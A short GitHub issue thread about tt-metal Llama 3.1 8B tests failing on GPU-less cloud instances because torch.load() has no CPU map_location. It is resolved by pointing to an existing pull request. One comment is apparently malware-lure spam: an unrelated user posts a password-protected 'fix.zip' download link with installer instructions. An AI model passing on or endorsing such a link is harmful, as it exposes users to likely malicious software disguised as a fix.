### ISSUE TITLE
[Feature Request] test_llama_x.py in demos/wormhole/llama31_8b/tests fail on tt cloud

### ISSUE THREAD

**Issue by sameetram** [tenstorrent/tt-metal#11986]
**Bug Description**
Most of the test_llama_x.py scripts in /tt-metal/models/demos/wormhole/llama31_8b/tests fail on tenstorrent cloud instances, because they invoke "torch.load()" without specifying map_location=torch.device("cpu"). This fails because the cloud instances on tenstorrent do not have Nvidia GPU.

**Expected Behavior**
It would be nice if the tests ran out of the box on the cloud demo instances. Perhaps models.utility_functions could have a get_torch_mapped_device() function -- something like device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")

and then all instances of torch.load() in these files could pass in mapped_device=get_torch_mapped_device()

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by uaydonat** [comment]
Do you have this: https://github.com/tenstorrent/tt-metal/pull/11675 ?

**Comment by sameetram** [comment]
Ah, I am on previous release, sorry. Closing ticket.
